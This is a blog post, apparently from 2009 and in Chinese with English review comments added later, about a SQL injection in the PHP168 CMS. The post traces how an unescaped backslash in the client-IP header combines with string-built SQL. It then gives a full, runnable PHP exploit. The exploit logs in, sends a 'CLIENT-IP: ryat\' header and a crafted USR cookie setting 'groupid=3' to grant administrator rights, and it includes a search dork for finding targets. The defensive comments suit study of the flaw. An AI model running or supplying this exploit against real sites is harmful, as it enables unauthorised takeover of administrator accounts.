分类: 网络与安全

2009-01-31 12:16:51

简单分析下这个漏洞
common.inc.php
// Resolve the client address that is later stored as lastip.
// NOTE(review): HTTP_CLIENT_IP and HTTP_X_FORWARDED_FOR are ordinary request
// headers that any client can set, so $onlineip is attacker-controlled unless
// a trusted proxy overwrites them; only REMOTE_ADDR comes from the socket.
if($_SERVER[''HTTP_CLIENT_IP'']){
     $onlineip=$_SERVER[''HTTP_CLIENT_IP''];
}elseif($_SERVER[''HTTP_X_FORWARDED_FOR'']){
     $onlineip=$_SERVER[''HTTP_X_FORWARDED_FOR''];
}else{
     $onlineip=$_SERVER[''REMOTE_ADDR''];
}
// filtrate() (function.inc.php, below) HTML-encodes a few characters but does
// not touch the backslash, and the value is later interpolated into a quoted
// SQL literal. A safer shape: reject anything that is not a literal address
// (filter_var($onlineip, FILTER_VALIDATE_IP) === false -> use REMOTE_ADDR) and
// bind the value as a query parameter instead of interpolating it.
// NOTE(review): the empty replacement string "" shown here is probably a
// rendering artefact (a back-reference such as "\\1" lost on the page) —
// confirm against the original common.inc.php.
$onlineip = preg_replace("/^([\d\.]+).*/", "", filtrate($onlineip));
//这个地方使用preg_replace存在着安全隐患,之前就暴过漏洞,官方修补的方法是用filtrate函数处理了下$onlineip
看一下filtrate函数是怎么处理的
function.inc.php
/**
 * Escapes a handful of characters in $msg for HTML output and returns the
 * result.
 *
 * NOTE(review): as rendered on this page every search string equals its
 * replacement (e.g. '&' -> '&'); the HTML entities of the real source
 * (&amp;, &quot;, &lt;, ...) were most likely decoded by the blog renderer,
 * so read each pair below as "character -> entity" — confirm against the
 * original function.inc.php.
 *
 * Security note: this is HTML-context escaping only. The backslash is never
 * touched, so a value that passed through filtrate() is NOT safe to
 * interpolate into a quoted SQL string literal; use prepared statements for
 * that context.
 */
function filtrate($msg){
    $msg = str_replace(''&'',''&'',$msg);   // '&' -> entity (presumably &amp;)
    $msg = str_replace('' '','' '',$msg);   // space -> entity (presumably &nbsp;)
    $msg = str_replace(''"'',''"'',$msg);   // '"' -> entity (presumably &quot;)
    $msg = str_replace("''",'''''',$msg);   // "'" -> entity (presumably &#39;)
    $msg = str_replace("<","<",$msg);       // '<' -> entity (presumably &lt;)
    $msg = str_replace(">",">",$msg);       // '>' -> entity (presumably &gt;)
    $msg = str_replace("\t","       ",$msg); // tab -> spaces/entities
    $msg = str_replace("\r","",$msg);       // strip carriage returns
    $msg = str_replace("   ","   ",$msg);   // runs of spaces -> entities (presumably)
    // Backslash is deliberately absent from this list — see the note above.
    return $msg;
}
过滤了 '、"、< 等字符,但是没有处理反斜杠 \
common.inc.php
    // Online-time bookkeeping for the logged-in user. The block opens here;
    // its closing brace is not shown on this page.
    if($usr_oltime>30||!$usr_oltime){
        // Only clamps the value at 600; $usr_oltime is never validated as a
        // number before being interpolated into SQL below. NOTE(review): it
        // appears to originate from the USR cookie field — confirm in the
        // original source.
        $usr_oltime>600 && $usr_oltime=600;
        include(PHP168_PATH."php168/level.php");
        if( isset($memberlevel[$lfjdb[groupid]]) ){
            $SQL=",groupid=8";
            $lfjdb[money]=get_money($lfjuid);
            // The last level whose money threshold the user meets wins.
            foreach( $memberlevel AS $key=>$value){
                if($lfjdb[money]>=$value){
                    $SQL=",groupid=$key";
                }
            }
        }else{
            $SQL="";
        }
        // String-built UPDATE: $timestamp, $onlineip, $usr_oltime and $lfjuid
        // are interpolated directly. $onlineip comes from client-controlled
        // headers and filtrate() does not neutralise a backslash, so a value
        // ending in "\" swallows the closing quote of lastip and the following
        // $usr_oltime text becomes part of the statement. Fix: bind every value
        // with a prepared statement, cast $usr_oltime to int, and validate
        // $onlineip with FILTER_VALIDATE_IP before it is stored.
        $db->query("UPDATE {$pre}memberdata SET lastvist=''$timestamp'',lastip=''$onlineip'',oltime=oltime+''$usr_oltime''$SQL WHERE uid=''$lfjuid''");
//因为这个地方是拼接字符串的形式,所以可以使用\来转义'',然后利用$usr_oltime来注射:)另外要注意的是$usr_oltime有一个简单的判断的,而且还要保证sql语句的语法正确,看下我构造的语句:
UPDATE {$pre}memberdata SET lastvist=''$timestamp'',lastip=''[\]'',oltime=oltime+''[+31,groupid=3,introduce=0x70757265745f74 WHERE uid=2#]''$SQL WHERE uid=''$lfjuid''
最后给出 EXP:
#!/usr/bin/php
// NOTE(review): no "<?php" open tag is visible on the page; the original
// script presumably had one right after the shebang.
print_r(''
+---------------------------------------------------------------------------+
Php168 <= v2008 update user access exploit
from:
dork: "Powered by PHP168"
+---------------------------------------------------------------------------+
'');
/**
* works regardless of php.ini settings
*/
// Argument check: host, path, user and pass are required ($argc counts the
// script name itself, hence 5).
if ($argc < 5) {
    print_r(''
+---------------------------------------------------------------------------+
Usage: php ''.$argv[0].'' host path user pass
host:      target server (ip/hostname)
path:      path to php168
user:      login username
pass:      login password
Example:
php ''.$argv[0].'' localhost /php168/
+---------------------------------------------------------------------------+
'');
    exit;
}
error_reporting(7);                 // E_ERROR | E_WARNING | E_PARSE
ini_set(''max_execution_time'', 0);
$host = $argv[1];
$path = $argv[2];
$user = $argv[3];
$pass = $argv[4];
// First send(): $cookie is still unset, so send() performs the login POST
// (see the function below).
$resp = send();
// Pull the "passport" session cookie out of the response headers;
// $cookie[1] is the whole cookie value, $cookie[2] the leading digits (used
// as the uid in send()).
preg_match(''/Set-Cookie:\s(passport=([0-9]{1,4})%09[a-zA-Z0-9%]+)/'', $resp, $cookie);
// Second send(): with $cookie set, send() posts to member/userinfo.php. The
// success check looks for "puret_t", which is the ASCII decoding of the hex
// literal 0x70757265745f74 written into `introduce` by the payload.
// Brace-less nested if/else: each else binds to the nearest if, which is the
// intended pairing here.
if ($cookie)
    if (strpos(send(), ''puret_t'') !== false)
        exit("Expoilt Success!\nYou Are Admin Now!\n");
    else
        exit("Exploit Failed!\n");
else
    exit("Exploit Failed!\n");
/**
 * Returns a pseudo-random alphanumeric string of $length characters
 * (default 8) drawn from [A-Za-z0-9] with mt_rand().
 *
 * The generator is re-seeded from the sub-second part of microtime() on
 * every call, exactly as the original did; mt_rand() is not a
 * cryptographic source, which is fine for the cookie filler it is used for.
 * A non-positive $length yields an empty string.
 */
function rands($length = 8)
{
    $alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
    $lastIndex = strlen($alphabet) - 1;
    // Same seed value as the original; the explicit (int) only avoids the
    // float-to-int deprecation notice on newer PHP.
    mt_srand((int) ((double) microtime() * 1000000));
    $out = '';
    while (strlen($out) < $length) {
        $out .= $alphabet[mt_rand(0, $lastIndex)];
    }
    return $out;
}
/**
 * Builds one raw HTTP/1.1 POST, sends it to $host on port 80 and returns the
 * complete response (status line, headers and body) as a string.
 *
 * Two modes, chosen by the global $cookie:
 *  - $cookie unset: login POST to {$path}login.php with username, password
 *    and step=2.
 *  - $cookie set:   POST to {$path}member/userinfo.php carrying the session
 *    cookie plus a crafted USR field, and a CLIENT-IP header whose value ends
 *    in a single backslash — the two inputs discussed in the analysis above.
 *
 * Defender notes: such a request is recognisable by a CLIENT-IP (or
 * X-Forwarded-For) value that is not a valid IP address — here it ends in
 * "\" — and by a cookie containing SQL fragments (groupid=, WHERE, #). On
 * the server the fix is to validate the address with FILTER_VALIDATE_IP,
 * cast oltime to int and use prepared statements for the UPDATE.
 *
 * No error handling: fsockopen() returns false on failure, fputs() on a false
 * handle emits a warning (a TypeError on PHP 8), and the read loop is then
 * skipped, so an unreachable host yields an empty string.
 */
function send()
{
    global $host, $path, $user, $pass, $cookie;
    if ($cookie) {
        // Appends the USR field to the session cookie; the passport cookie
        // format uses tab (%09) separators, see the regex in the caller.
        // This mutates the global, so it is only meant to run once.
        $cookie[1] .= '';USR=''.rands()."\t%2b31,groupid=3,introduce=0x70757265745f74 WHERE uid=$cookie[2]#\t\t";
        $cmd = '''';   // empty body: Content-Length 0
        $message = "POST ".$path."member/userinfo.php  HTTP/1.1\r\n";
        $message .= "Accept: */*\r\n";
        $message .= "Accept-Language: zh-cn\r\n";
        $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
        // "\\\\" in a double-quoted string is one backslash: the header value
        // sent is "ryat\" — the character filtrate() never escapes.
        $message .= "CLIENT-IP: ryat\\\r\n";
        $message .= "Host: $host\r\n";
        $message .= "Content-Length: ".strlen($cmd)."\r\n";
        $message .= "Connection: Close\r\n";
        $message .= "Cookie: ".$cookie[1]."\r\n\r\n";
        $message .= $cmd;
    } else {
        // Login request; credentials are sent unencoded in the form body.
        $cmd = "username=$user&password=$pass&step=2";
        $message = "POST ".$path."login.php  HTTP/1.1\r\n";
        $message .= "Accept: */*\r\n";
        $message .= "Accept-Language: zh-cn\r\n";
        $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
        $message .= "Host: $host\r\n";
        $message .= "Content-Length: ".strlen($cmd)."\r\n";
        $message .= "Connection: Close\r\n\r\n";
        $message .= $cmd;
    }
    // Plain TCP on port 80, no timeout and no check of the return value.
    $fp = fsockopen($host, 80);
    fputs($fp, $message);
    $resp = '''';
    // Read until the server closes the connection (Connection: Close above).
    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);
    return $resp;
}
?>
 